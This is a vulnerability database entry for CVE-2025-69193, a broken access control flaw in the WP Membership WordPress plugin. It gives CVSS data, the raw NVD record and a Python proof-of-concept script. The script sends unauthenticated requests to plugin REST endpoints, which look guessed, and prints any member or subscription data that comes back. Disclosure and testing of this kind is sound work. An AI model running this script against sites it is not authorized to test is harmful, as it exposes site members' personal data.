Security Vulnerability Report
中文
CVE-2025-69193 CVSS 7.3 HIGH

CVE-2025-69193

Published: 2026-01-22 17:16:26
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins WP Membership wp-membership allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Membership: from n/a through <= 1.6.4.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Membership (wp-membership) <= 1.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69193 PoC - WP Membership Broken Access Control # Target: WordPress site with WP Membership plugin <= 1.6.4 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-69193""" # Endpoints that should require authorization endpoints = [ '/wp-json/wp-membership/v1/members', '/wp-json/wp-membership/v1/subscriptions', '/wp-json/wp-membership/v1/content-access', '/?rest_route=/wp-membership/v1/members', '/?rest_route=/wp-membership/v1/subscriptions' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-69193 - WP Membership Broken Access Control\n") vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we can access protected data without auth if response.status_code == 200: try: data = response.json() if data and len(str(data)) > 10: print(f"[VULN] {url}") print(f" Status: {response.status_code}") print(f" Response preview: {str(data)[:200]}...") print() vulnerable = True except: pass elif response.status_code == 401 or response.status_code == 403: print(f"[SAFE] {url} - Properly protected") except Exception as e: print(f"[ERROR] {url} - {str(e)}") if vulnerable: print("\n[!] Target is VULNERABLE to CVE-2025-69193") print("[!] Recommendation: Update WP Membership plugin to latest version") else: print("\n[*] Target appears to be patched or not vulnerable") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-69193-poc.py <target_url>") print("Example: python cve-2025-69193-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69193", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:26.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins WP Membership wp-membership allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Membership: from n/a through <= 1.6.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en e-plugins WP Membership wp-membership permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Membership: desde n/a hasta &lt;= 1.6.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-membership/vulnerability/wordpress-wp-membership-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}